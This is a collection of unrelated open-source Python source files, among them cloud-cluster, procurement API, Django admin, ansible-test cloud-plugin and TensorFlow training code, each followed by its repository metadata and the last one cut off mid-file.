        cluster = self.cm.get_cluster(cluster_tag, load_receipt=False)
        node = cluster.get_node(self.opts.node)
        if self.opts.user:
            node.ssh.switch_user(self.opts.user)
        # Validate each literal (non-glob) path before transferring anything
        for remote_path in remote_paths:
            if glob.has_magic(remote_path):
                continue
            if not node.ssh.path_exists(remote_path):
                raise exception.BaseException(
                    "Remote file or directory does not exist: %s" % remote_path)
        node.ssh.get(remote_paths, local_path)
|
cjh1/StarCluster
|
starcluster/commands/get.py
|
Python
|
gpl-3.0
| 2,628
|
#!/usr/bin/env python3
import sys
import os
import path_utils
import fsquery
import mvtools_exception
def puaq():
    # Print usage and abort ("puaq" = print usage and quit).
    print("Usage: %s folder" % path_utils.basename_filtered(__file__))
    sys.exit(1)
def insert_pragma(path):
    """Prepend a GCC system_header pragma to every .h file under *path*."""
    header_exts = ["h"]
    ok, result = fsquery.makecontentlist(path, True, False, True, False, False, False, True, header_exts)
    if not ok:
        raise mvtools_exception.mvtools_exception(result)
    pragma_str = "\n#ifdef __GNUC__\n#pragma GCC system_header\n#endif\n"
    failed_bucket = [] #currently unused
    for header_file in result:
        # Read the current contents, then rewrite with the pragma first
        with open(header_file) as f:
            original_contents = f.read()
        with open(header_file, "w") as f:
            f.write(pragma_str + original_contents)
    if failed_bucket:
        print("There were failures!")
        for fb in failed_bucket:
            print("%s failed." % fb)
    else:
        print("All done - no errors detected")
if __name__ == "__main__":
if len(sys.argv) < 2:
puaq()
else:
insert_pragma(sys.argv[1])
|
mvendra/mvtools
|
insert_pragma.py
|
Python
|
mit
| 1,020
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import codecs
from setuptools import setup
# Use the README as the long description shown on PyPI.
with codecs.open(
    os.path.join(os.path.dirname(__file__), 'README.rst'), 'r', 'utf8',
) as ld_file:
    long_description = ld_file.read()

# Package metadata for the doit-cmd helper module.
setup (
    name = 'doit-cmd',
    version = '0.1.0',
    author = 'Eduardo Naufel Schettino',
    author_email = 'schettino72@gmail.com',
    description = 'Helper to create doit tasks that execute a command',
    long_description = long_description,
    url = 'https://github.com/pydoit/doit-cmd/',
    keywords = ['doit',],
    platforms = ['any'],
    license = 'MIT',
    py_modules = ['doitcmd'],
    install_requires = ['doit'],
    classifiers = [
        'Development Status :: 4 - Beta',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Natural Language :: English',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.3',
        'Programming Language :: Python :: 3.4',
        'Topic :: Software Development :: Libraries',
        'Topic :: Software Development :: Libraries :: Python Modules',
    ]
)
|
pydoit/doit-cmd
|
setup.py
|
Python
|
mit
| 1,238
|
# -*- coding: utf-8 -*-
from openprocurement.api.utils import (
json_view,
context_unpack,
APIResource,
get_now,
raise_operation_error
)
from openprocurement.tender.core.utils import (
save_tender, optendersresource, apply_patch,
)
from openprocurement.tender.belowthreshold.utils import (
add_next_award
)
from openprocurement.tender.core.validation import (
validate_cancellation_data,
validate_patch_cancellation_data,
)
@optendersresource(name='belowThreshold:Tender Cancellations',
                   collection_path='/tenders/{tender_id}/cancellations',
                   path='/tenders/{tender_id}/cancellations/{cancellation_id}',
                   procurementMethodType='belowThreshold',
                   description="Tender cancellations")
class TenderCancellationResource(APIResource):
    """REST resource for creating, listing and resolving cancellations of a
    belowThreshold tender (whole-tender or per-lot)."""

    def cancel_tender(self):
        """Cancel the whole tender, discarding bids if still collecting."""
        tender = self.request.validated['tender']
        # Bids are dropped only while the tender is still in a bidding phase
        if tender.status in ['active.tendering', 'active.auction']:
            tender.bids = []
        tender.status = 'cancelled'

    def cancel_lot(self, cancellation=None):
        """Cancel the lot referenced by the cancellation and recompute the
        overall tender status from the remaining lot statuses."""
        if not cancellation:
            cancellation = self.context
        tender = self.request.validated['tender']
        # Mark the related lot cancelled (side effect via comprehension)
        [setattr(i, 'status', 'cancelled') for i in tender.lots if i.id == cancellation.relatedLot]
        statuses = set([lot.status for lot in tender.lots])
        if statuses == set(['cancelled']):
            # Every lot cancelled -> the whole tender is cancelled
            self.cancel_tender()
        elif not statuses.difference(set(['unsuccessful', 'cancelled'])):
            tender.status = 'unsuccessful'
        elif not statuses.difference(set(['complete', 'unsuccessful', 'cancelled'])):
            tender.status = 'complete'
        # If all remaining competitive active lots finished their auctions,
        # move on to awarding
        if tender.status == 'active.auction' and all([
            i.auctionPeriod and i.auctionPeriod.endDate
            for i in self.request.validated['tender'].lots
            if i.numberOfBids > 1 and i.status == 'active'
        ]):
            add_next_award(self.request)

    def validate_cancellation(self, operation):
        """ TODO move validators
        This class is inherited in openua, openeu, limited packages, but validate_cancellation function has different validators.
        For now, we have no way to use different validators on methods according to procedure type.
        """
        tender = self.request.validated['tender']
        # No changes allowed once the tender reached a terminal status
        if tender.status in ['complete', 'cancelled', 'unsuccessful']:
            raise_operation_error(self.request, 'Can\'t {} cancellation in current ({}) tender status'.format(operation, tender.status))
        cancellation = self.request.validated['cancellation']
        cancellation.date = get_now()
        # The targeted lot (if any) must still be active
        if any([i.status != 'active' for i in tender.lots if i.id == cancellation.relatedLot]):
            raise_operation_error(self.request, 'Can {} cancellation only in active lot status'.format(operation))
        return True

    @json_view(content_type="application/json", validators=(validate_cancellation_data,), permission='edit_tender')
    def collection_post(self):
        """Post a cancellation
        """
        if not self.validate_cancellation('add'):
            return
        cancellation = self.request.validated['cancellation']
        cancellation.date = get_now()
        # An already-active cancellation takes effect immediately
        if cancellation.relatedLot and cancellation.status == 'active':
            self.cancel_lot(cancellation)
        elif cancellation.status == 'active':
            self.cancel_tender()
        self.request.context.cancellations.append(cancellation)
        if save_tender(self.request):
            self.LOGGER.info('Created tender cancellation {}'.format(cancellation.id),
                             extra=context_unpack(self.request, {'MESSAGE_ID': 'tender_cancellation_create'}, {'cancellation_id': cancellation.id}))
            self.request.response.status = 201
            self.request.response.headers['Location'] = self.request.route_url('{}:Tender Cancellations'.format(self.request.validated['tender'].procurementMethodType), tender_id=self.request.validated['tender_id'], cancellation_id=cancellation.id)
            return {'data': cancellation.serialize("view")}

    @json_view(permission='view_tender')
    def collection_get(self):
        """List cancellations
        """
        return {'data': [i.serialize("view") for i in self.request.validated['tender'].cancellations]}

    @json_view(permission='view_tender')
    def get(self):
        """Retrieving the cancellation
        """
        return {'data': self.request.validated['cancellation'].serialize("view")}

    @json_view(content_type="application/json", validators=(validate_patch_cancellation_data,), permission='edit_tender')
    def patch(self):
        """Post a cancellation resolution
        """
        if not self.validate_cancellation('update'):
            return
        apply_patch(self.request, save=False, src=self.request.context.serialize())
        # Activating a cancellation via patch triggers the same effects as
        # posting an active one
        if self.request.context.relatedLot and self.request.context.status == 'active':
            self.cancel_lot()
        elif self.request.context.status == 'active':
            self.cancel_tender()
        if save_tender(self.request):
            self.LOGGER.info('Updated tender cancellation {}'.format(self.request.context.id),
                             extra=context_unpack(self.request, {'MESSAGE_ID': 'tender_cancellation_patch'}))
            return {'data': self.request.context.serialize("view")}
|
openprocurement/openprocurement.tender.belowthreshold
|
openprocurement/tender/belowthreshold/views/cancellation.py
|
Python
|
apache-2.0
| 5,411
|
# ~*~ coding: utf-8 ~*~
from django import forms
from datetimewidget.widgets import DateTimeWidget
from django.utils.translation import ugettext_lazy as _
from django.forms import formset_factory
from django.forms.models import modelformset_factory, inlineformset_factory
from virtenviro.content.models import *
import codecs
from django.conf import settings
__author__ = 'Kamo Petrosyan'
class PagesAdminForm(forms.ModelForm):
    """Admin form for Page objects; only category pages may be parents."""

    def __init__(self, *args, **kwargs):
        super(PagesAdminForm, self).__init__(*args, **kwargs)
        # Restrict the parent selector to category pages
        self.fields['parent'].queryset = Page.objects.filter(is_category=True)

    class Meta:
        model = Page
        exclude = ['last_modified']
        widgets = {
            'title': forms.TextInput(attrs={'placeholder': _('Title'), 'class': "form-control"}),
            'slug': forms.TextInput(attrs={'placeholder': _('Slug'), 'class': "form-control"}),
            'template': forms.Select(attrs={'class': "form-control"}),
            'parent': forms.Select(attrs={'class': "form-control"}),
            'ordering': forms.NumberInput(attrs={'class': "form-control", 'min': 0}),
            'pub_datetime': DateTimeWidget(attrs={'id': "id_pub_datetime"}, usel10n=True, bootstrap_version=3),
            'last_modified_by': forms.Select(attrs={'disabled': 'disabled', 'class': 'form-control disabled'})
        }

    def clean_parent(self):
        # Normalize a missing selection to None (stored as NULL)
        parent = self.cleaned_data.get('parent')
        if not parent:
            parent = None
        return parent
class ContentAdminForm(forms.ModelForm):
    """Admin form for per-language Content rows, with CKEditor for the body."""

    class Meta:
        model = Content
        widgets = {
            'title': forms.TextInput(attrs={'placeholder': _('Title'), 'class': "form-control"}),
            'h1': forms.TextInput(attrs={'placeholder': _('H1'), 'class': "form-control"}),
            'intro': forms.Textarea(attrs={'placeholder': _('Intro text'), 'class': 'form-control', 'rows': 4}),
            'content': forms.Textarea(attrs={'placeholder': _('Intro text'), 'class': 'ckeditor'}),
            'template': forms.Select(attrs={'class': "form-control"}),
            'language': forms.Select(attrs={'class': "form-control disabled"}),
            'meta_title': forms.TextInput(attrs={'placeholder': _('Meta title'), 'class': "form-control"}),
            'meta_keywords': forms.Textarea(
                attrs={'placeholder': _('Meta keywords'), 'class': 'form-control', 'rows': 2}),
            'meta_description': forms.Textarea(
                attrs={'placeholder': _('Meta description'), 'class': 'form-control', 'rows': 2}),
            'author': forms.Select(attrs={'class': 'form-control'}),
            'pub_datetime': DateTimeWidget(attrs={'class': 'form-control'}, usel10n=True, bootstrap_version=3),
            'last_modified_by': forms.Select(attrs={'disabled': 'disabled', 'class': 'form-control disabled'})
        }
        # parent is managed by the inline formset, not edited directly
        exclude = ['parent']

    class Media:
        # CKEditor assets loaded on the admin page that renders this form
        css = {'all': ('/static/css/ckeditor.css',)}
        js = (
            '/static/ckeditor/ckeditor.js',
            '/static/filebrowser/js/FB_CKEditor.js',
            '/static/js/ckeditor.js',
        )
class TemplateAdminForm(forms.ModelForm):
    """Admin form that edits a Template row together with the template
    file's contents on disk."""

    code = forms.CharField(widget=forms.Textarea(attrs={'placeholder': _('Code'), 'class': 'form-control', 'rows': 20}))

    def __init__(self, *args, **kwargs):
        super(TemplateAdminForm, self).__init__(*args, **kwargs)
        # Preload the template file's source into the "code" field; any
        # failure (missing file, no filename on an add form, bad encoding)
        # just leaves the editor empty.  Narrowed from a bare "except:" so
        # KeyboardInterrupt/SystemExit still propagate, and switched to a
        # "with" block so the file handle is closed even on read errors.
        try:
            template_path = os.path.join(settings.TEMPLATES[0]['DIRS'][0], self.instance.filename)
            with codecs.open(template_path, 'r', 'utf-8') as template_file:
                self.fields['code'].initial = template_file.read()
        except Exception:
            self.fields['code'].initial = ''

    def save(self, force_insert=False, force_update=False, commit=True):
        """Write the edited code back to the template file, then save the
        model instance (unless commit=False)."""
        instance = super(TemplateAdminForm, self).save(commit=False)
        code = self.cleaned_data['code']
        template_path = os.path.join(settings.TEMPLATES[0]['DIRS'][0], self.cleaned_data['filename'])
        # "with" guarantees the file is flushed/closed even if write fails
        with codecs.open(template_path, 'w', 'utf-8') as template_file:
            template_file.write(code)
        if commit:
            instance.save()
        return instance

    class Meta:
        model = Template
        widgets = {
            'title': forms.TextInput(attrs={'placeholder': _('Title'), 'class': "form-control"}),
            'filename': forms.TextInput(attrs={'placeholder': _('File name'), 'class': "form-control"}),
            'parent': forms.Select(attrs={'class': "form-control"}),
        }
        fields = ['title', 'filename', 'parent', 'code']
# Inline formset editing Content rows attached to a Page; one extra blank
# form per configured site language.
ContentAdminFormset = inlineformset_factory(
    Page,
    Content,
    form=ContentAdminForm,
    extra=len(settings.LANGUAGES),
    exclude=['last_modified'])
|
Haikson/virtenviro
|
virtenviro/content/admin_forms.py
|
Python
|
apache-2.0
| 4,786
|
from random import randint
from sys import argv
if __name__ == '__main__':
    # Usage: generator.py <components_count> <max_vectors_count> <high_bound> <file_name>
    components_count = int(argv[1])
    max_vectors_count = int(argv[2])
    high_bound = int(argv[3])
    file_name = argv[4]
    # A set deduplicates identical vectors, so the output may hold fewer
    # than max_vectors_count entries.
    result = set()
    # Distinct loop variables: the inner generator previously reused "i",
    # shadowing the outer loop index.
    for _ in range(max_vectors_count):
        result.add(tuple(randint(0, high_bound) for _c in range(components_count)))
    # Output format: first line is the dimension, then one tab-separated
    # vector per line.
    with open(file_name, 'w') as out:
        out.write('{}\n'.format(components_count))
        for item in result:
            out.write('\t'.join((str(x) for x in item)) + '\n')
|
vanashimko/k-means
|
generator.py
|
Python
|
mit
| 526
|
"""Plugin system for cloud providers and environments for use in integration tests."""
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import abc
import atexit
import datetime
import json
import time
import os
import platform
import random
import re
import tempfile
from .. import types as t
from ..util import (
ApplicationError,
display,
is_shippable,
import_plugins,
load_plugins,
ABC,
to_bytes,
make_dirs,
ANSIBLE_TEST_CONFIG_ROOT,
)
from ..target import (
TestTarget,
)
from ..config import (
IntegrationConfig,
)
from ..data import (
data_context,
)
PROVIDERS = {}
ENVIRONMENTS = {}
def initialize_cloud_plugins():
    """Import cloud plugins and load them into the plugin dictionaries."""
    import_plugins('cloud')
    # Populate the module-level registries keyed by plugin name.
    load_plugins(CloudProvider, PROVIDERS)
    load_plugins(CloudEnvironment, ENVIRONMENTS)
def get_cloud_platforms(args, targets=None):
    """
    Return the sorted cloud platform names used by the given targets (or
    recorded in the run metadata when no targets are given).

    :type args: TestConfig
    :type targets: tuple[IntegrationTarget] | None
    :rtype: list[str]
    """
    # When only listing targets there is nothing to provision
    if isinstance(args, IntegrationConfig) and args.list_targets:
        return []
    if targets is None:
        platforms = set(args.metadata.cloud_config or [])
    else:
        platforms = {get_cloud_platform(target) for target in targets}
    # Targets without a cloud platform contribute None - drop it
    platforms.discard(None)
    return sorted(platforms)
def get_cloud_platform(target):
    """Return the single cloud platform a target requires, or None.
    :type target: IntegrationTarget
    :rtype: str | None
    """
    # 'cloud/<name>/' aliases identify the platform; a bare 'cloud/' does not.
    names = {alias.split('/')[1] for alias in target.aliases
             if alias.startswith('cloud/') and alias.endswith('/') and alias != 'cloud/'}

    if not names:
        return None

    if len(names) > 1:
        raise ApplicationError('Target %s aliases contains multiple cloud platforms: %s' % (target.name, ', '.join(sorted(names))))

    name = names.pop()

    if name not in PROVIDERS:
        raise ApplicationError('Target %s aliases contains unknown cloud platform: %s' % (target.name, name))

    return name
def get_cloud_providers(args, targets=None):
    """Instantiate one provider plugin per required cloud platform.
    :type args: IntegrationConfig
    :type targets: tuple[IntegrationTarget] | None
    :rtype: list[CloudProvider]
    """
    platforms = get_cloud_platforms(args, targets)
    return [PROVIDERS[name](args) for name in platforms]
def get_cloud_environment(args, target):
    """Instantiate the environment plugin for a target's cloud platform.
    :type args: IntegrationConfig
    :type target: IntegrationTarget
    :rtype: CloudEnvironment
    """
    platform = get_cloud_platform(target)

    # Non-cloud targets have no environment.
    return ENVIRONMENTS[platform](args) if platform else None
def cloud_filter(args, targets):
    """Collect the alias patterns of cloud targets that must be excluded.
    :type args: IntegrationConfig
    :type targets: tuple[IntegrationTarget]
    :return: list[str]
    """
    if args.metadata.cloud_config is not None:
        return []  # cloud filter already performed prior to delegation

    excluded = []

    for provider in get_cloud_providers(args, targets):
        provider.filter(targets, excluded)

    return excluded
def cloud_init(args, targets):
    """Set up each required cloud provider and record setup timing results.
    :type args: IntegrationConfig
    :type targets: tuple[IntegrationTarget]
    """
    if args.metadata.cloud_config is not None:
        return  # cloud configuration already established prior to delegation

    args.metadata.cloud_config = {}

    results = {}

    for provider in get_cloud_providers(args, targets):
        args.metadata.cloud_config[provider.platform] = {}

        start = time.time()
        provider.setup()
        elapsed = time.time() - start

        results[provider.platform] = dict(
            platform=provider.platform,
            setup_seconds=int(elapsed),
            targets=[target.name for target in targets],
        )

    if results and not args.explain:
        # Collapse non-digits in the timestamp to dashes for a filesystem-safe name.
        timestamp = re.sub(r'[^0-9]', '-', str(datetime.datetime.utcnow().replace(microsecond=0)))
        results_path = 'test/results/data/%s-%s.json' % (args.command, timestamp)

        make_dirs(os.path.dirname(results_path))

        with open(results_path, 'w') as results_fd:
            results_fd.write(json.dumps(dict(clouds=results), sort_keys=True, indent=4))
class CloudBase(ABC):
    """Base class for cloud plugins."""
    __metaclass__ = abc.ABCMeta

    # Keys used in args.metadata.cloud_config[platform].
    _CONFIG_PATH = 'config_path'
    _RESOURCE_PREFIX = 'resource_prefix'
    _MANAGED = 'managed'
    _SETUP_EXECUTED = 'setup_executed'

    def __init__(self, args):
        """
        :type args: IntegrationConfig
        """
        self.args = args
        # Plugin modules are named after their platform (e.g. cloud.aws -> 'aws').
        self.platform = self.__module__.split('.')[-1]

        def config_callback(files):  # type: (t.List[t.Tuple[str, str]]) -> None
            """Add the config file to the payload file list."""
            if self._get_cloud_config(self._CONFIG_PATH, ''):
                if data_context().content.collection:
                    working_path = data_context().content.collection.directory
                else:
                    working_path = ''

                pair = (self.config_path, os.path.join(working_path, os.path.relpath(self.config_path, data_context().content.root)))

                if pair not in files:
                    display.info('Including %s config: %s -> %s' % (self.platform, pair[0], pair[1]), verbosity=3)
                    files.append(pair)

        data_context().register_payload_callback(config_callback)

    @property
    def setup_executed(self):
        """Whether setup has already run for this platform.
        :rtype: bool
        """
        return self._get_cloud_config(self._SETUP_EXECUTED, False)

    @setup_executed.setter
    def setup_executed(self, value):
        """
        :type value: bool
        """
        self._set_cloud_config(self._SETUP_EXECUTED, value)

    @property
    def config_path(self):
        """Absolute path of the cloud config file.
        :rtype: str
        """
        return os.path.join(data_context().content.root, self._get_cloud_config(self._CONFIG_PATH))

    @config_path.setter
    def config_path(self, value):
        """
        :type value: str
        """
        self._set_cloud_config(self._CONFIG_PATH, value)

    @property
    def resource_prefix(self):
        """Prefix applied to cloud resources created for this run.
        :rtype: str
        """
        return self._get_cloud_config(self._RESOURCE_PREFIX)

    @resource_prefix.setter
    def resource_prefix(self, value):
        """
        :type value: str
        """
        self._set_cloud_config(self._RESOURCE_PREFIX, value)

    @property
    def managed(self):
        """Whether the cloud resource is managed by ansible-test.
        :rtype: bool
        """
        return self._get_cloud_config(self._MANAGED)

    @managed.setter
    def managed(self, value):
        """
        :type value: bool
        """
        self._set_cloud_config(self._MANAGED, value)

    def _get_cloud_config(self, key, default=None):
        """Read a value from this platform's cloud config metadata.
        :type key: str
        :type default: str | int | bool | None
        :rtype: str | int | bool
        """
        config = self.args.metadata.cloud_config[self.platform]

        if default is None:
            return config[key]  # missing keys raise KeyError

        return config.get(key, default)

    def _set_cloud_config(self, key, value):
        """Store a value in this platform's cloud config metadata.
        :type key: str
        :type value: str | int | bool
        """
        self.args.metadata.cloud_config[self.platform][key] = value
class CloudProvider(CloudBase):
    """Base class for cloud provider plugins. Sets up cloud resources before delegation."""
    TEST_DIR = 'test/integration'

    def __init__(self, args, config_extension='.ini'):
        """
        :type args: IntegrationConfig
        :type config_extension: str
        """
        super(CloudProvider, self).__init__(args)

        self.remove_config = False
        self.config_extension = config_extension
        self.config_static_name = 'cloud-config-%s%s' % (self.platform, config_extension)
        self.config_static_path = os.path.join(self.TEST_DIR, self.config_static_name)
        self.config_template_path = os.path.join(ANSIBLE_TEST_CONFIG_ROOT, '%s.template' % self.config_static_name)

    def filter(self, targets, exclude):
        """Filter out the cloud tests when the necessary config and resources are not available.
        :type targets: tuple[TestTarget]
        :type exclude: list[str]
        """
        marker = 'cloud/%s/' % self.platform
        affected = [target.name for target in targets if marker in target.aliases]

        if affected:
            exclude.append(marker)
            display.warning('Excluding tests marked "%s" which require config (see "%s"): %s'
                            % (marker.rstrip('/'), self.config_template_path, ', '.join(affected)))

    def setup(self):
        """Setup the cloud resource before delegation and register a cleanup callback."""
        self.resource_prefix = self._generate_resource_prefix()
        atexit.register(self.cleanup)

    def get_remote_ssh_options(self):  # pylint: disable=locally-disabled, no-self-use
        """Get any additional options needed when delegating tests to a remote instance via SSH.
        :rtype: list[str]
        """
        return []

    def get_docker_run_options(self):  # pylint: disable=locally-disabled, no-self-use
        """Get any additional options needed when delegating tests to a docker container.
        :rtype: list[str]
        """
        return []

    def cleanup(self):
        """Clean up the cloud resource and any temporary configuration files after tests complete."""
        if self.remove_config:
            os.remove(self.config_path)

    def _use_static_config(self):
        """Use a pre-existing static config file when one is present.
        :rtype: bool
        """
        static = os.path.isfile(self.config_static_path)

        if static:
            display.info('Using existing %s cloud config: %s' % (self.platform, self.config_static_path), verbosity=1)
            self.config_path = self.config_static_path

        # Resources are only managed by ansible-test when no static config exists.
        self.managed = not static

        return static

    def _write_config(self, content):
        """Write a temporary config file and mark it for removal on cleanup.
        :type content: str
        """
        prefix = '%s-' % os.path.splitext(os.path.basename(self.config_static_path))[0]

        with tempfile.NamedTemporaryFile(dir=self.TEST_DIR, prefix=prefix, suffix=self.config_extension, delete=False) as config_fd:
            filename = os.path.join(self.TEST_DIR, os.path.basename(config_fd.name))

            self.config_path = filename
            self.remove_config = True

            display.info('>>> Config: %s\n%s' % (filename, content.strip()), verbosity=3)

            config_fd.write(to_bytes(content))
            config_fd.flush()

    def _read_config_template(self):
        """Read the config template with comment lines stripped.
        :rtype: str
        """
        with open(self.config_template_path, 'r') as template_fd:
            lines = template_fd.read().splitlines()

        content = [line for line in lines if not line.startswith('#')]

        return '\n'.join(content).strip() + '\n'

    @staticmethod
    def _populate_config_template(template, values):
        """Substitute '@key' markers in the template with their values.
        :type template: str
        :type values: dict[str, str]
        :rtype: str
        """
        # Sorted keys keep the substitution order deterministic.
        for key in sorted(values):
            template = template.replace('@%s' % key, values[key])

        return template

    @staticmethod
    def _generate_resource_prefix():
        """Generate a prefix for identifying cloud resources created by this run.
        :rtype: str
        """
        if is_shippable():
            return 'shippable-%s-%s' % (
                os.environ['SHIPPABLE_BUILD_NUMBER'],
                os.environ['SHIPPABLE_JOB_NUMBER'],
            )

        node = re.sub(r'[^a-zA-Z0-9]+', '-', platform.node().split('.')[0]).lower()

        return 'ansible-test-%s-%d' % (node, random.randint(10000000, 99999999))
class CloudEnvironment(CloudBase):
    """Base class for cloud environment plugins. Updates integration test environment after delegation."""

    def setup_once(self):
        """Run setup if it has not already been run."""
        if not self.setup_executed:
            self.setup()
            self.setup_executed = True

    def setup(self):
        """Setup which should be done once per environment instead of once per test target."""

    @abc.abstractmethod
    def get_environment_config(self):
        """Return the config to apply to the test environment.
        :rtype: CloudEnvironmentConfig
        """

    def on_failure(self, target, tries):
        """Hook invoked when a test target fails; default does nothing.
        :type target: IntegrationTarget
        :type tries: int
        """
class CloudEnvironmentConfig:
    """Configuration for the environment."""

    def __init__(self, env_vars=None, ansible_vars=None, module_defaults=None, callback_plugins=None):
        """
        :type env_vars: dict[str, str] | None
        :type ansible_vars: dict[str, any] | None
        :type module_defaults: dict[str, dict[str, any]] | None
        :type callback_plugins: list[str] | None
        """
        # Each attribute defaults to None, meaning "nothing to apply".
        self.env_vars = env_vars
        self.ansible_vars = ansible_vars
        self.module_defaults = module_defaults
        self.callback_plugins = callback_plugins
|
aperigault/ansible
|
test/lib/ansible_test/_internal/cloud/__init__.py
|
Python
|
gpl-3.0
| 13,034
|
# Copyright 2018 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r""""""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import namedtuple
import os
import time
import tensorflow as tf
import gin.tf
# Command-line configuration for the training binary.
flags = tf.app.flags
flags.DEFINE_multi_string('config_file', None,
'List of paths to the config files.')
flags.DEFINE_multi_string('params', None,
'Newline separated list of Gin parameter bindings.')
flags.DEFINE_string('train_dir', None,
'Directory for writing logs/summaries during training.')
flags.DEFINE_string('master', 'local',
'BNS name of the TensorFlow master to use.')
flags.DEFINE_integer('task', 0, 'task id')
flags.DEFINE_integer('save_interval_secs', 300, 'The frequency at which '
'checkpoints are saved, in seconds.')
flags.DEFINE_integer('save_summaries_secs', 30, 'The frequency at which '
'summaries are saved, in seconds.')
flags.DEFINE_boolean('summarize_gradients', False,
'Whether to generate gradient summaries.')
FLAGS = flags.FLAGS
# Bundle of the three ops run by TrainStep.train_step: the policy update,
# the meta-controller update, and experience collection.
TrainOps = namedtuple('TrainOps',
['train_op', 'meta_train_op', 'collect_experience_op'])
class TrainStep(object):
    """Handles training step."""

    def __init__(self,
                 max_number_of_steps=0,
                 num_updates_per_observation=1,
                 num_collect_per_update=1,
                 num_collect_per_meta_update=1,
                 log_every_n_steps=1,
                 policy_save_fn=None,
                 save_policy_every_n_steps=0,
                 should_stop_early=None):
        """Returns a function that is executed at each step of slim training.
        Args:
          max_number_of_steps: Optional maximum number of train steps to take.
          num_updates_per_observation: Number of updates per observation.
          num_collect_per_update: Collect ops to run per policy update.
          num_collect_per_meta_update: Steps between meta-controller updates.
          log_every_n_steps: The frequency, in terms of global steps, that the loss
            and global step are logged.
          policy_save_fn: A tf.Saver().save function to save the policy.
          save_policy_every_n_steps: How frequently to save the policy.
          should_stop_early: Optional hook to report whether training should stop.
        Raises:
          ValueError: If policy_save_fn is not provided when
            save_policy_every_n_steps > 0.
        """
        if save_policy_every_n_steps and policy_save_fn is None:
            raise ValueError(
                'policy_save_fn is required when save_policy_every_n_steps > 0')

        self.max_number_of_steps = max_number_of_steps
        self.num_updates_per_observation = num_updates_per_observation
        self.num_collect_per_update = num_collect_per_update
        self.num_collect_per_meta_update = num_collect_per_meta_update
        self.log_every_n_steps = log_every_n_steps
        self.policy_save_fn = policy_save_fn
        self.save_policy_every_n_steps = save_policy_every_n_steps
        self.should_stop_early = should_stop_early
        self.last_global_step_val = 0
        # Session callables are compiled lazily on the first train_step call.
        self.train_op_fn = None
        self.collect_and_train_fn = None
        tf.logging.info('Training for %d max_number_of_steps',
                        self.max_number_of_steps)

    def train_step(self, sess, train_ops, global_step, _):
        """This function will be called at each step of training.
        This represents one step of the DDPG algorithm and can include:
        1. collect a <state, action, reward, next_state> transition
        2. update the target network
        3. train the actor
        4. train the critic
        Args:
          sess: A Tensorflow session.
          train_ops: A DdpgTrainOps tuple of train ops to run.
          global_step: The global step.
        Returns:
          A scalar total loss.
          A boolean should stop.
        """
        start_time = time.time()

        if self.train_op_fn is None:
            # Compile the session callables once, on first use.
            self.train_op_fn = sess.make_callable([train_ops.train_op, global_step])
            self.meta_train_op_fn = sess.make_callable([train_ops.meta_train_op, global_step])
            self.collect_fn = sess.make_callable([train_ops.collect_experience_op, global_step])
            self.collect_and_train_fn = sess.make_callable(
                [train_ops.train_op, global_step, train_ops.collect_experience_op])
            self.collect_and_meta_train_fn = sess.make_callable(
                [train_ops.meta_train_op, global_step, train_ops.collect_experience_op])

        # Extra collect/update passes beyond the fused collect-and-train below.
        for _unused in range(self.num_collect_per_update - 1):
            self.collect_fn()
        for _unused in range(self.num_updates_per_observation - 1):
            self.train_op_fn()

        total_loss, global_step_val, _discard = self.collect_and_train_fn()

        # Run a meta update whenever the step counter crosses a
        # num_collect_per_meta_update boundary.
        if (global_step_val // self.num_collect_per_meta_update !=
                self.last_global_step_val // self.num_collect_per_meta_update):
            self.meta_train_op_fn()

        time_elapsed = time.time() - start_time

        should_stop = bool(self.max_number_of_steps and
                           global_step_val >= self.max_number_of_steps)

        if global_step_val != self.last_global_step_val:
            if (self.save_policy_every_n_steps and
                    global_step_val // self.save_policy_every_n_steps !=
                    self.last_global_step_val // self.save_policy_every_n_steps):
                self.policy_save_fn(sess)
            if (self.log_every_n_steps and
                    global_step_val % self.log_every_n_steps == 0):
                tf.logging.info(
                    'global step %d: loss = %.4f (%.3f sec/step) (%d steps/sec)',
                    global_step_val, total_loss, time_elapsed, 1 / time_elapsed)

        self.last_global_step_val = global_step_val

        stop_early = bool(self.should_stop_early and self.should_stop_early())
        return total_loss, should_stop or stop_early
def create_counter_summaries(counters):
    """Add named summaries to counters, a list of tuples (name, counter)."""
    if not counters:
        return
    with tf.name_scope('Counters/'):
        for name, counter in counters:
            tf.summary.scalar(name, counter)
def gen_debug_batch_summaries(batch):
    """Generates summaries for the sampled replay batch."""
    states, actions, rewards, _, next_states = batch
    with tf.name_scope('batch'):
        # NOTE(review): next_states histograms reuse the states dimension —
        # presumably both tensors share the same final axis; confirm upstream.
        state_dims = states.get_shape()[-1]
        for idx in range(state_dims):
            tf.summary.histogram('states_%d' % idx, states[:, idx])
        for idx in range(state_dims):
            tf.summary.histogram('next_states_%d' % idx, next_states[:, idx])
        for idx in range(actions.get_shape()[-1]):
            tf.summary.histogram('actions_%d' % idx, actions[:, idx])
        tf.summary.histogram('rewards', rewards)
|
tombstone/models
|
research/efficient-hrl/train_utils.py
|
Python
|
apache-2.0
| 7,027
|
import json
import pika
import time
import threading
from flask import current_app
from listenbrainz.webserver import create_app
from listenbrainz.webserver.views.api_tools import LISTEN_TYPE_PLAYING_NOW
from listenbrainz.mbid_mapping_writer.job_queue import MappingJobQueue
class MBIDMappingWriter(threading.Thread):
    """ Main entry point for the mapping writer. Sets up connections and
    handles messages from RabbitMQ and stuff them into the queue for the
    job matcher to handle."""

    def __init__(self, app):
        """
        :param app: Flask application whose context/config the thread uses.
        """
        threading.Thread.__init__(self)
        self.app = app
        self.queue = None  # MappingJobQueue, created in run()

    def callback(self, channel, method, properties, body):
        """RabbitMQ delivery handler: enqueue the listens and ack the message."""
        listens = json.loads(body)
        self.queue.add_new_listens(listens)
        channel.basic_ack(method.delivery_tag)

